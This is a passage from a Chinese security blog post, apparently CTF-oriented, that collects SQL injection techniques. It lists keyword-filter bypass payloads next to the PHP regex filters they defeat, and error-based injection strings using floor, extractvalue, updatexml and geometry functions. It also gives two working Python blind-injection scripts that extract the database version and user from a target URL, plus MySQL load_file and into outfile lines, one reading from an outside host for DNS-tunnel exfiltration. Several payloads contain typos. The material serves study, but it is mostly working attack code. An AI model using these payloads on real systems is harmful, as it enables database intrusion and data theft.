&amp;&amp; 1=1</span><br><span class="line"></span><br><span class="line">过滤关键字    and or union</span><br><span class="line">php代码    preg_match('/(and|or|union)/i',$id)</span><br><span class="line">会过滤的攻击代码    union <span class="keyword">select</span> <span class="keyword">user</span>,<span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">users</span></span><br><span class="line">绕过方式    <span class="number">1</span> &amp;&amp; (<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> userid=<span class="number">1</span>)=<span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line">过滤关键字    <span class="keyword">and</span> <span class="keyword">or</span> <span class="keyword">union</span> <span class="keyword">where</span></span><br><span class="line">php代码    preg_match(<span class="string">'/(and|or|union|where)/i'</span>,$<span class="keyword">id</span>)</span><br><span class="line">会过滤的攻击代码    <span class="number">1</span> &amp;&amp; (<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> user_id = <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line">绕过方式    <span class="number">1</span> &amp;&amp; (<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line">过滤关键字    <span class="keyword">and</span> <span class="keyword">or</span> <span class="keyword">union</span> <span class="keyword">where</span></span><br><span class="line">php代码    preg_match(<span class="string">'/(and|or|union|where)/i'</span>,$<span class="keyword">id</span>)</span><br><span class="line">会过滤的攻击代码    <span class="number">1</span> &amp;&amp; (<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> user_id = <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line">绕过方式    <span class="number">1</span> &amp;&amp; (<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line">过滤关键字    <span class="keyword">and</span>, <span class="keyword">or</span>, <span class="keyword">union</span>, <span class="keyword">where</span>, <span class="keyword">limit</span></span><br><span class="line">php代码    preg_match(<span class="string">'/(and|or|union|where|limit)/i'</span>, $<span class="keyword">id</span>)</span><br><span class="line">会过滤的攻击代码    <span class="number">1</span> &amp;&amp; (<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line">绕过方式    <span class="number">1</span> &amp;&amp; (<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">group</span> <span class="keyword">by</span> user_id <span class="keyword">having</span> user_id = <span class="number">1</span>) = <span class="string">'admin'</span>#user_id聚合中user_id为<span class="number">1</span>的<span class="keyword">user</span>为<span class="keyword">admin</span></span><br><span class="line"></span><br><span class="line">过滤关键字    <span class="keyword">and</span>, <span class="keyword">or</span>, <span class="keyword">union</span>, <span class="keyword">where</span>, <span class="keyword">limit</span>, <span class="keyword">group</span> <span class="keyword">by</span></span><br><span class="line">php代码    preg_match(<span class="string">'/(and|or|union|where|limit|group by)/i'</span>, $<span class="keyword">id</span>)</span><br><span class="line">会过滤的攻击代码    <span class="number">1</span> &amp;&amp; (<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">group</span> <span class="keyword">by</span> user_id <span class="keyword">having</span> user_id = <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line">绕过方式    <span class="number">1</span> &amp;&amp; (<span class="keyword">select</span> <span class="keyword">substr</span>(<span class="keyword">group_concat</span>(user_id),<span class="number">1</span>,<span class="number">1</span>) <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> ) = <span class="number">1</span></span><br><span class="line"></span><br><span class="line">过滤关键字    <span class="keyword">and</span>, <span class="keyword">or</span>, <span class="keyword">union</span>, <span class="keyword">where</span>, <span class="keyword">limit</span>, <span class="keyword">group</span> <span class="keyword">by</span>, <span class="keyword">select</span></span><br><span class="line">php代码    preg_match(<span class="string">'/(and|or|union|where|limit|group by|select)/i'</span>, $<span class="keyword">id</span>)</span><br><span class="line">会过滤的攻击代码    <span class="number">1</span> &amp;&amp; (<span class="keyword">select</span> <span class="keyword">substr</span>(gruop_concat(user_id),<span class="number">1</span>,<span class="number">1</span>) <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span>) = <span class="number">1</span></span><br><span class="line">绕过方式    <span class="number">1</span> &amp;&amp; <span class="keyword">substr</span>(<span class="keyword">user</span>,<span class="number">1</span>,<span class="number">1</span>) = <span class="string">'a'</span></span><br><span class="line"></span><br><span class="line">过滤关键字    <span class="keyword">and</span>, <span class="keyword">or</span>, <span class="keyword">union</span>, <span class="keyword">where</span>, <span class="keyword">limit</span>, <span class="keyword">group</span> <span class="keyword">by</span>, <span class="keyword">select</span>, <span class="string">'</span></span><br><span class="line"><span class="string">php代码    preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|<span class="keyword">union</span>|<span class="keyword">where</span>|<span class="keyword">limit</span>|<span class="keyword">group</span> <span class="keyword">by</span>|<span class="keyword">select</span>|\<span class="string">')/i'</span>, $<span class="keyword">id</span>)</span><br><span class="line">会过滤的攻击代码    <span class="number">1</span> &amp;&amp; (<span class="keyword">select</span> <span class="keyword">substr</span>(gruop_concat(user_id),<span class="number">1</span>,<span class="number">1</span>) <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span>) = <span class="number">1</span></span><br><span class="line">绕过方式    <span class="number">1</span> &amp;&amp; user_id <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">null</span> <span class="number">1</span> &amp;&amp; <span class="keyword">substr</span>(<span class="keyword">user</span>,<span class="number">1</span>,<span class="number">1</span>) = <span class="number">0x61</span> <span class="number">1</span> &amp;&amp; <span class="keyword">substr</span>(<span class="keyword">user</span>,<span class="number">1</span>,<span class="number">1</span>) = <span class="keyword">unhex</span>(<span class="number">61</span>)</span><br><span class="line"></span><br><span class="line">过滤关键字    <span class="keyword">and</span>, <span class="keyword">or</span>, <span class="keyword">union</span>, <span class="keyword">where</span>, <span class="keyword">limit</span>, <span class="keyword">group</span> <span class="keyword">by</span>, <span class="keyword">select</span>, <span class="string">', hex</span></span><br><span class="line"><span class="string">php代码    preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|<span class="keyword">union</span>|<span class="keyword">where</span>|<span class="keyword">limit</span>|<span class="keyword">group</span> <span class="keyword">by</span>|<span class="keyword">select</span>|\<span class="string">'|hex)/i'</span>, $<span class="keyword">id</span>)</span><br><span class="line">会过滤的攻击代码    <span class="number">1</span> &amp;&amp; <span class="keyword">substr</span>(<span class="keyword">user</span>,<span class="number">1</span>,<span class="number">1</span>) = <span class="keyword">unhex</span>(<span class="number">61</span>)</span><br><span class="line">绕过方式    <span class="number">1</span> &amp;&amp; <span class="keyword">substr</span>(<span class="keyword">user</span>,<span class="number">1</span>,<span class="number">1</span>) = <span class="keyword">lower</span>(<span class="keyword">conv</span>(<span class="number">11</span>,<span class="number">10</span>,<span class="number">16</span>)) #十进制的<span class="number">11</span>转化为十六进制，并小写。</span><br><span class="line"></span><br><span class="line">过滤关键字    <span class="keyword">and</span>, <span class="keyword">or</span>, <span class="keyword">union</span>, <span class="keyword">where</span>, <span class="keyword">limit</span>, <span class="keyword">group</span> <span class="keyword">by</span>, <span class="keyword">select</span>, <span class="string">', hex, substr</span></span><br><span class="line"><span class="string">php代码    preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|<span class="keyword">union</span>|<span class="keyword">where</span>|<span class="keyword">limit</span>|<span class="keyword">group</span> <span class="keyword">by</span>|<span class="keyword">select</span>|\<span class="string">'|hex|substr)/i'</span>, $<span class="keyword">id</span>)</span><br><span class="line">会过滤的攻击代码    <span class="number">1</span> &amp;&amp; <span class="keyword">substr</span>(<span class="keyword">user</span>,<span class="number">1</span>,<span class="number">1</span>) = <span class="keyword">lower</span>(<span class="keyword">conv</span>(<span class="number">11</span>,<span class="number">10</span>,<span class="number">16</span>))/td&gt;</span><br><span class="line">绕过方式    <span class="number">1</span> &amp;&amp; <span class="keyword">lpad</span>(<span class="keyword">user</span>,<span class="number">7</span>,<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">过滤关键字    <span class="keyword">and</span>, <span class="keyword">or</span>, <span class="keyword">union</span>, <span class="keyword">where</span>, <span class="keyword">limit</span>, <span class="keyword">group</span> <span class="keyword">by</span>, <span class="keyword">select</span>, <span class="string">', hex, substr, 空格</span></span><br><span class="line"><span class="string">php代码    preg_match('</span>/(<span class="keyword">and</span>|<span class="keyword">or</span>|<span class="keyword">union</span>|<span class="keyword">where</span>|<span class="keyword">limit</span>|<span class="keyword">group</span> <span class="keyword">by</span>|<span class="keyword">select</span>|\<span class="string">'|hex|substr|\s)/i'</span>, $<span class="keyword">id</span>)</span><br><span class="line">会过滤的攻击代码    <span class="number">1</span> &amp;&amp; <span class="keyword">lpad</span>(<span class="keyword">user</span>,<span class="number">7</span>,<span class="number">1</span>)/td&gt;</span><br><span class="line">绕过方式    <span class="number">1</span>%<span class="number">0</span>b||%<span class="number">0</span>blpad(<span class="keyword">user</span>,<span class="number">7</span>,<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">过滤关键字    <span class="keyword">and</span> <span class="keyword">or</span> <span class="keyword">union</span> <span class="keyword">where</span></span><br><span class="line">php代码    preg_match(<span class="string">'/(and|or|union|where)/i'</span>,$<span class="keyword">id</span>)</span><br><span class="line">会过滤的攻击代码    <span class="number">1</span> || (<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">where</span> user_id = <span class="number">1</span>) = <span class="string">'admin'</span></span><br><span class="line">绕过方式    <span class="number">1</span> || (<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">1</span>) = <span class="string">'admin'</span></span><br></pre></td></tr></table></figure>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><li> floor报错</li>

<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> select 1 <span class="keyword">from</span> (select count(*),concat(version(),floor(rand(0)<span class="number">*2</span>))x <span class="keyword">from</span> information_schema.tables<span class="built_in"> group </span>by x)a);</span><br></pre></td></tr></table></figure>
<li> ExtractValue报错</li>

<figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and extractvalue(<span class="number">1</span>, concat(<span class="number">0</span>x5c, (<span class="name">select</span> table_name from information_schema.tables limit <span class="number">1</span>)))<span class="comment">;</span></span><br></pre></td></tr></table></figure>
<li> UpdateXml报错</li>

<figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and <span class="number">1</span>=(<span class="name">updatexml</span>(<span class="number">1</span>,concat(<span class="number">0</span>x3a,(<span class="name">select</span> user())),<span class="number">1</span>))</span><br></pre></td></tr></table></figure>
<li> NAME_CONST报错</li>

<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">and</span> <span class="selector-tag">exists</span>(select*from (select*from(selectname_const(<span class="variable">@@version</span>,<span class="number">0</span>))a join (select name_const(<span class="variable">@@version</span>,<span class="number">0</span>))b)c)</span><br></pre></td></tr></table></figure>
<li> join报错</li>

<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span> mysql.<span class="keyword">user</span> ajoin mysql.<span class="keyword">user</span> b)c;</span><br></pre></td></tr></table></figure>
<li> exp报错</li>

<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> exp(~(select * <span class="keyword">from</span> (select<span class="built_in"> user </span>() ) a) );</span><br></pre></td></tr></table></figure>
<li> GeometryCollection()报错</li>

<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> GeometryCollection(()select <span class="number">*f</span>rom(select<span class="built_in"> user </span>() )a)b );</span><br></pre></td></tr></table></figure>
<li> polygon ()报错</li>

<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> polygon (()select * <span class="keyword">from</span>(select<span class="built_in"> user </span>())a)b );</span><br></pre></td></tr></table></figure>
<li> multipoint ()报错</li>

<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and </span><span class="keyword">multipoint </span>(()<span class="keyword">select </span>* from(<span class="keyword">select </span>user() )a)<span class="keyword">b </span>)<span class="comment">;</span></span><br></pre></td></tr></table></figure>
<li> multlinestring ()报错</li>

<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and </span><span class="keyword">multlinestring </span>(()<span class="keyword">select </span>* from(<span class="keyword">selectuser </span>() )a)<span class="keyword">b </span>)<span class="comment">;</span></span><br></pre></td></tr></table></figure>
<li> multpolygon ()报错</li>

<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and </span><span class="keyword">multpolygon </span>(()<span class="keyword">select </span>* from(<span class="keyword">selectuser </span>() )a)<span class="keyword">b </span>)<span class="comment">;</span></span><br></pre></td></tr></table></figure>
<li> linestring ()报错</li>

<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and linestring (()<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>() )a)b );</span><br></pre></td></tr></table></figure>
<h2 id="延时注入脚本"><a href="#延时注入脚本" class="headerlink" title="延时注入脚本"></a>延时注入脚本</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#encoding=utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"><span class="keyword">import</span> httplib</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">'User-Agent'</span>: <span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">payloads = list(string.ascii_lowercase)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">10</span>):</span><br><span class="line">	payloads.append(str(i))</span><br><span class="line">payloads += [<span class="string">'@'</span>,<span class="string">'_'</span>, <span class="string">'.'</span>, <span class="string">'-'</span>, <span class="string">'\\'</span>, <span class="string">' '</span>,<span class="string">'~'</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">u'开始爆破:'</span></span><br><span class="line"></span><br><span class="line">version = <span class="string">''</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">10</span>):</span><br><span class="line">    <span class="keyword">for</span> payload <span class="keyword">in</span> payloads:</span><br><span class="line">    	timeout_count = <span class="number">0</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">        	conn = httplib.HTTPConnection(<span class="string">'ip'</span>, timeout=<span class="number">5</span>)</span><br><span class="line">        	s = <span class="string">"if (ascii(substr(version(),%s,1))=%s) WAITFOR DELAY '0:0:10' --"</span> % (i, ord(payload))</span><br><span class="line">        	params = <span class="string">"lib=83';"</span> + urllib.quote(s)+<span class="string">"&amp;lev=2"</span></span><br><span class="line">        	conn.request(method=<span class="string">'GET'</span>, url= <span class="string">'/bookhtm/book.asp?'</span> + params,headers = headers)</span><br><span class="line">        	html_doc = conn.getresponse().read()</span><br><span class="line">        	conn.close()</span><br><span class="line">        	<span class="keyword">print</span> s+<span class="string">'\n'</span>,</span><br><span class="line">        <span class="keyword">except</span> Exception, e:</span><br><span class="line">        	timeout_count += <span class="number">1</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> timeout_count == <span class="number">1</span>:	</span><br><span class="line">        	version += payload</span><br><span class="line">        	<span class="keyword">print</span> <span class="string">'\n[+]'</span>,payload</span><br><span class="line">        	<span class="keyword">print</span> <span class="string">'\n[*]'</span>, version</span><br><span class="line">        	<span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">'\n[+] Result is:'</span>, version</span><br></pre></td></tr></table></figure>
<h2 id="Mysql布尔盲注脚本"><a href="#Mysql布尔盲注脚本" class="headerlink" title="Mysql布尔盲注脚本"></a>Mysql布尔盲注脚本</h2><blockquote>
<p>当某个盲注点不能使用工具（一般有waf限制）的时候<br>可以使用这个脚本用于证明漏洞的存在</p>
</blockquote>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">! usr/bin/env python</span><br><span class="line"> -*- coding: utf<span class="number">-8</span> -*-</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> httplib</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> <span class="keyword">string</span></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> <span class="built_in">random</span></span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"></span><br><span class="line">headers = &#123;<span class="string">'User-Agent'</span>: <span class="string">'Mozilla/5.0 Chrome/28.0.1500.63'</span>,&#125;</span><br><span class="line">payloads = list(<span class="string">'abcdefghijklmnopqrstuvwxyz0123456789@_.'</span>)</span><br><span class="line"><span class="built_in">print</span> <span class="string">'start to retrive MySQL user:'</span></span><br><span class="line">user = <span class="string">''</span></span><br><span class="line"><span class="built_in">for</span> i in range(<span class="number">1</span>,<span class="number">21</span>):</span><br><span class="line">    <span class="built_in">for</span> payload in payloads:</span><br><span class="line">        conn = httplib.HTTPConnection(<span class="string">'www.example.com'</span>, timeout=<span class="number">4</span>)      #连接,host</span><br><span class="line">        s = <span class="string">"ascii(mid(lower(user()),%s,1))=%s"</span> % (i, ord(payload))       <span class="meta">#payload</span></span><br><span class="line">        conn.request(method=<span class="string">'GET'</span>,url=<span class="string">"/php/1.php?id=1 and %s"</span> % s,headers = headers)  <span class="meta">#url</span></span><br><span class="line">        html_header= conn.getresponse().<span class="built_in">read</span>()</span><br><span class="line">        length=len(html_header)</span><br><span class="line">        <span class="built_in">if</span> length&gt;<span class="number">10000</span>:</span><br><span class="line">            user+=payload</span><br><span class="line">            sys.stdout.<span class="built_in">write</span>(<span class="string">'\r[In progress] %s'</span> % user)</span><br><span class="line">            sys.stdout.<span class="built_in">flush</span>()</span><br><span class="line">            <span class="built_in">break</span></span><br><span class="line">        <span class="built_in">else</span>:</span><br><span class="line">            <span class="built_in">print</span> <span class="string">'.'</span>,</span><br><span class="line">            conn.<span class="built_in">close</span>()</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">'\n[Done]MySQL user is'</span>, user</span><br></pre></td></tr></table></figure>
<h2 id="注入中读取文件"><a href="#注入中读取文件" class="headerlink" title="注入中读取文件"></a>注入中读取文件</h2><h3 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h3><blockquote>
<p>常见的读文件，可以用16进制代替字符串</p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">load_file</span>(<span class="string">'c:/boot.ini'</span>)</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">load_file</span>(<span class="number">0x633a2f626f6f742e696e69</span>)</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">load_file</span>(<span class="string">'//ecma.io/1.txt'</span>)       # smb协议</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">load_file</span>(<span class="string">'\\\\ecma.io\\1.txt'</span>)    # 可用于DNS隧道</span><br></pre></td></tr></table></figure>
<blockquote>
<p>写文件</p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="number">0x313233</span> <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/1.txt'</span></span><br><span class="line"><span class="keyword">select</span> <span class="number">0x313233</span> <span class="keyword">into</span> <span class="keyword">dumpfile</span> <span class="string">'D:/1.txt'</span></span><br></pre></td></tr></table></figure>
<p>参考:<a href="http://www.lijiejie.com/mysql-injection-bypass-waf-2/" target="_blank" rel="noopener">MySQL注射的过滤绕过技巧</a><br><a href="http://byd.dropsec.xyz/2016/08/01/SQL-Injection%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7/" target="_blank" rel="noopener">SQL注入绕过技巧</a><br><a href="http://www.bugku.com/forum.php?mod=viewthread&amp;tid=93&amp;extra=page%3D1%26filter%3Dtypeid%26typeid%3D26" target="_blank" rel="noopener">sql注入12个报错方式</a><br><a href="http://wps2015.org/drops/drops/%E6%B7%B1%E5%85%A5%E4%BA%86%E8%A7%A3SQL%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87waf%E5%92%8C%E8%BF%87%E6%BB%A4%E6%9C%BA%E5%88%B6.html" target="_blank" rel="noopener">深入了解SQL注入绕过waf和过滤机制</a><br><a href="https://_thorns.gitbooks.io/sec/content/" target="_blank" rel="noopener">安全手册</a><br><a href="http://www.venenof.com/index.php/archives/240/" target="_blank" rel="noopener">About Join</a><br><a href="http://drops.blbana.cc/2017/05/20/SQLi-%E2%80%94%E2%80%94-%E9%80%97%E5%8F%B7%EF%BC%8C%E7%A9%BA%E6%A0%BC%EF%BC%8C%E5%AD%97%E6%AE%B5%E5%90%8D%E8%BF%87%E6%BB%A4%E7%AA%81%E7%A0%B4/" target="_blank" rel="noopener">SQLi —— 逗号，空格，字段名过滤突破</a></p>

      
    </div>

    
      
      



      
      
    

    
      <footer class="post-footer">
        
          <div class="post-tags">
            
              <a href="/tags/ctf/">ctf</a>
            
              <a href="/tags/SQL注入/">SQL注入</a>
            
          </div>
        
        
        
  <nav class="post-nav">
    
      <a class="prev" href="/2017/10/29/似乎没好好研究过HTTP状态码/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">似乎没好好研究过HTTP状态码</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    
    
      <a class="next" href="/2017/10/08/矿大新闻热点爬虫系统搬砖记录/">
        <span class="next-text nav-default">Python爬虫,收藏功能实现记录</span>
        <span class="prev-text nav-mobile">下一篇</span>
        <i class="iconfont icon-right"></i>
      </a>
    
  </nav>

      </footer>
    

  </article>


          </div>
          
  <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div> 
    </div>
  </div>


        </div>
      </main>

      <footer id="footer" class="footer">

  <div class="social-links">
    
      
        
          <a href="https://github.com/bay1" class="iconfont icon-github" title="github"></a>
        
      
    
      
        
          <a href="http://weibo.com/3190704711/profile?topnav=1&wvr=6&is_all=1" class="iconfont icon-weibo" title="weibo"></a>
        
      
    
      
    
      
    
      
    
    
    
  </div>


<div class="copyright">
  <span class="copyright-year">
    
    &copy; 
     
      2016 - 
    
    2018
    <span class="author">bay1</span>
  </span>
</div>
      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>

    
  
  <script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://bay1.top/2017/10/27/各种注入姿势/';
        this.page.identifier = '2017/10/27/各种注入姿势/';
        this.page.title = '各种注入姿势';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//https-blog-flywinky-top-1.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script>



    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  


    <script type="text/javascript" src="/js/src/even.js?v=2.6.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=2.6.0"></script>
<script src="/js/prettify.js"></script>
<script type="text/javascript">
$(document).ready(function(){
 $('pre').addClass('prettyprint');
   prettyPrint();
 })
</script>
  </body>
</html>
